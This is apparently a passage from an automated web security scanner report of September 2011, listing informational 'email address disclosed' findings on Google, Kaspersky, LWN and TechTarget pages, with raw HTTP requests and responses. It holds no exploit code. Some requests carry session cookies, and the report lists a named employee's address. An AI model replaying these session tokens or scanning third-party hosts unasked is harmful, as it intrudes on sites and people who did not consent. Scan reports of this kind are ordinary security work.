User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe

Response

HTTP/1.1 200 OK
ETag: "5c66-4d66bf1e"
Content-Type: application/x-javascript
Last-Modified: Thu, 24 Feb 2011 20:27:10 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=1686;ecid=114272462416,0)
Content-Length: 23654
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app56
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=7821
Expires: Sun, 04 Sep 2011 16:27:09 GMT
Date: Sun, 04 Sep 2011 14:16:48 GMT
Connection: close

// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function ($, window) {

   var
   // ColorBox Default Settings.
   // See http://colorpowered.com/colorbox for detail
...[SNIP]...

19.10. http://images.google.com/support/bin/answer.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.google.com
Path:	/support/bin/answer.py

Issue detail

The following email address was disclosed in the response:

test@fastdial.net

Request

GET /support/bin/answer.py HTTP/1.1
Host: images.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 14:00:23 GMT
Expires: Sun, 04 Sep 2011 14:00:23 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang=""
class="">
<head>
<pre style="font-size: 0;display: none;visibility: hidden;">

</pre>
<script
...[SNIP]...
<strong>test@fastdial.net</strong>
...[SNIP]...

19.11. http://latam.kaspersky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://latam.kaspersky.com
Path:	/

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET / HTTP/1.1
Host: latam.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
Etag: "1315141507-0"
Cache-Control: public, max-age=0
Last-Modified: Sun, 04 Sep 2011 13:05:07 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Content-Type: text/html; charset=utf-8
Content-Length: 41617
Date: Sun, 04 Sep 2011 14:01:56 GMT
X-Varnish: 1163235755 1163223310
Age: 332
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.12. http://lwn.net/Articles/456878/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lwn.net
Path:	/Articles/456878/

Issue detail

The following email addresses were disclosed in the response:

201108291748.p7THmqjp013782@int-mx02.intmail.prod.int.phx2.redhat.com
Enterprise-watch-list@redhat.com
bugzilla@redhat.com
enterprise-watch-list@redhat.com
rhsa-announce@redhat.com
secalert@redhat.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:27 GMT
Server: Apache
Expires: -1
Content-Length: 18566
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</
...[SNIP]...
<td valign="top">bugzilla@redhat.com </td>
...[SNIP]...
<td valign="top">rhsa-announce@redhat.com, enterprise-watch-list@redhat.com </td>
...[SNIP]...
<td valign="top"><201108291748.p7THmqjp013782@int-mx02.intmail.prod.int.phx2.redhat.com></td>
...[SNIP]...
</a>

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at <a href="https://access.redhat.com/security/team/contact/">
...[SNIP]...

Version: GnuPG v1.4.4 (GNU/Linux)

iD8DBQFOW9D3XlSAg2UNWIIRAiBIAJ94bis53lBOuMQhqo71HAjqyqeDxgCfe1RE
zE9jl6cqN6/fOI58SZN2Q34=
=RDd4
-----END PGP SIGNATURE-----

--
Enterprise-watch-list mailing list
Enterprise-watch-list@redhat.com
<a href="https://www.redhat.com/mailman/listinfo/enterprise-watch-list">
...[SNIP]...

19.13. https://lwn.net/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://lwn.net
Path:	/login

Issue detail

The following email address was disclosed in the response:

lwn@lwn.net

Request

GET /login HTTP/1.1
Host: lwn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 14:01:57 GMT
Server: Apache
Expires: -1
Content-Length: 5637
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>Log into LWN [LWN.net]</title>
<meta HTTP-EQU
...[SNIP]...
<a href="mailto:lwn@lwn.net">lwn@lwn.net</a>
...[SNIP]...

19.14. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following email address was disclosed in the response:

test@fastdial.net

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:01:57 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...
on(){m.prm&&m.prm()},Va=function(a){y("m",function(){m.spn(a)})},Wa=function(a){y("m",function(){m.spp(a)})};n("spn",Va);n("spp",Wa);Ca("gbd4",Ua);
if(_tvb("true",e)){var Xa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh5.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};v.prf=Xa}
function Ya(){funct
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...
sl.google.com/intl/en_us/mapfiles/","362b",0,,1,1,1,1,1,1,,,"https://cbks0.google.com",1,20,4096,,,,,,,,["rst","util"],["lt_c","pplhs","mg","stats"],,,1000,1,"maps_sv",4,,,1,,,"//gg.google.com/csi",0,"test@fastdial.net","",0,["https://khmdbs0.google.com/kh?v=000006\x26","https://khmdbs1.google.com/kh?v=000006\x26"],,"/maps/c",,,1,0,[["act_s",["act"]],["qopa",["act","qop","act_s"]],["ms",["info"]],["mv",["act"]],["cb
...[SNIP]...

19.15. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The following email address was disclosed in the response:

test@fastdial.net

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:01:57 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...
on(){m.prm&&m.prm()},Va=function(a){y("m",function(){m.spn(a)})},Wa=function(a){y("m",function(){m.spp(a)})};n("spn",Va);n("spp",Wa);Ca("gbd4",Ua);
if(_tvb("true",e)){var Xa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh5.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};v.prf=Xa}
function Ya(){funct
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...
us/mapfiles/","/intl/en_us/mapfiles/","362b",0,,1,1,1,1,1,1,,,"http://cbk0.google.com",1,20,4096,,,,,,,,["rst","util"],["lt_c","pplhs","mg","stats"],,,1000,1,"maps_sv",4,,,1,,,"//gg.google.com/csi",0,"test@fastdial.net","",0,["http://khmdb0.google.com/kh?v=000006\x26","http://khmdb1.google.com/kh?v=000006\x26"],,"/maps/c",,,1,0,[["act_s",["act"]],["qopa",["act","qop","act_s"]],["ms",["info"]],["mv",["act"]],["cb_app
...[SNIP]...

19.16. http://searchsecurity.techtarget.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchsecurity.techtarget.com
Path:	/

Issue detail

The following email address was disclosed in the response:

rwestervelt@techtarget.com

Request

GET / HTTP/1.1
Host: searchsecurity.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.17. http://searchsecurity.techtarget.com/digitalguide/images/Editorial/mmimoso-sm.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchsecurity.techtarget.com
Path:	/digitalguide/images/Editorial/mmimoso-sm.jpg

Issue detail

The following email address was disclosed in the response:

you@example.com

Request

GET /digitalguide/images/Editorial/mmimoso-sm.jpg HTTP/1.1
Host: searchsecurity.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A12D1D04E2200B0F06075BC564B36535; googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; BIGipServervgn7-web=302106634.20480.0000; tt_prereg=t1@299972%24t2@301219%24_2011-09-04%2007%3A14%3A05%26g%3D2240040538; __utma=1.1422293104.1315138449.1315138449.1315138449.2; __utmb=1.1.10.1315138449; __utmc=1; __utmz=1.1315138449.2.2.utmcsr=google.com|utmccn=(organic)|utmcmd=organic|utmctr=%22xss.cx%22

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 04 Sep 2011 12:15:00 GMT
Server: Apache
Location: http://media.techtarget.com/digitalguide/images/Editorial/mmimoso-sm.jpg
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 12:25:00 GMT
Content-Length: 396
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://media.techtarget
...[SNIP]...
<a href="mailto:you@example.com">
...[SNIP]...

19.18. https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224975900/offerID.8575749809 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.digitalriver.com
Path:	/store/kasperus/en_US/buy/productID.224975900/offerID.8575749809

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101162326246,0)
Date: Sun, 04 Sep 2011 12:31:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc2app91
Content-Length: 173147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.19. https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224976400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.digitalriver.com
Path:	/store/kasperus/en_US/buy/productID.224976400

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=139817269288,0)
Date: Sun, 04 Sep 2011 12:35:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc2app91
Content-Length: 173147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.20. http://support.kasperskyamericas.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET / HTTP/1.1
Host: support.kasperskyamericas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:02:24 GMT
Server: Apache
Vary: Cookie
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:02:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.21. http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/anti-virus-6-r2-mp4-windows-workstations

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:24 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:00:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 50184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.22. http://support.kasperskyamericas.com/corporate/contact-information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/contact-information

Issue detail

The following email addresses were disclosed in the response:

newvirus@kaspersky.com
support@us.kaspersky.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:56:03 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:56:02 GMT
ETag: "1e8a-4ac1df4724080"
Accept-Ranges: bytes
Content-Length: 31916
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="mailto:support@us.kaspersky.com">
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.23. http://support.kasperskyamericas.com/corporate/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/index.html

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET /corporate/index.html HTTP/1.1
Host: support.kasperskyamericas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:02:26 GMT
Server: Apache
Vary: Cookie
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:02:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.24. http://support.kasperskyamericas.com/corporate/live-chat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/live-chat

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:49 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 02:20:57 GMT
ETag: "1ec7-4ac143ea27440"
Accept-Ranges: bytes
Content-Length: 31465
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.25. http://support.kasperskyamericas.com/corporate/mobile-security-7-enterprise-edition previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/mobile-security-7-enterprise-edition

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:01:38 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 02:20:57 GMT
ETag: "2316-4ac143ea27440"
Accept-Ranges: bytes
Content-Length: 43720
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.26. http://support.kasperskyamericas.com/corporate/open-support-case previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/open-support-case

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:58 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 02:22:54 GMT
ETag: "2921-4ac14459bbb80"
Accept-Ranges: bytes
Content-Length: 52051
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.27. http://support.kasperskyamericas.com/search/node/xss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/search/node/xss

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:16:42 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:03:28 GMT
ETag: "19e7-4ac1e0f07ac00"
Accept-Ranges: bytes
Content-Length: 25794
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.28. http://translate.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/

Issue detail

The following email address was disclosed in the response:

test@fastdial.net

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:04:05 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Content-Type-Options: nosniff
Server: HTTP server (unknown)
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
on(){m.prm&&m.prm()},Sa=function(a){y("m",function(){m.spn(a)})},Ta=function(a){y("m",function(){m.spp(a)})};n("spn",Sa);n("spp",Ta);za("gbd4",Ra);
if(_tvb("true",e)){var Ua={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh5.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};v.prf=Ua}
function Va(){funct
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

19.29. http://usa.kaspersky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

Response

19.30. http://usa.kaspersky.com/about-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us

Issue detail

The following email addresses were disclosed in the response:

katelyn.fogarty@kaspersky.com
newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:37:32 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139852"
Content-Type: text/html; charset=utf-8
Content-Length: 33945
Date: Sun, 04 Sep 2011 12:37:41 GMT
X-Varnish: 1163074516
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<meta property="og:email" content="katelyn.fogarty@kaspersky.com" />
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.31. http://usa.kaspersky.com/about-us/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The following email addresses were disclosed in the response:

katelyn.fogarty@kaspersky.com
newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:55:55 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144555"
Content-Type: text/html; charset=utf-8
Content-Length: 41877
Date: Sun, 04 Sep 2011 13:55:57 GMT
X-Varnish: 1163222238
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<meta property="og:email" content="katelyn.fogarty@kaspersky.com" />
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.32. http://usa.kaspersky.com/about-us/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET /about-us/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:27 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145067"
Content-Type: text/html; charset=utf-8
Content-Length: 38389
Date: Sun, 04 Sep 2011 14:04:40 GMT
X-Varnish: 1163242022
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.33. http://usa.kaspersky.com/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/index.html

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET /index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

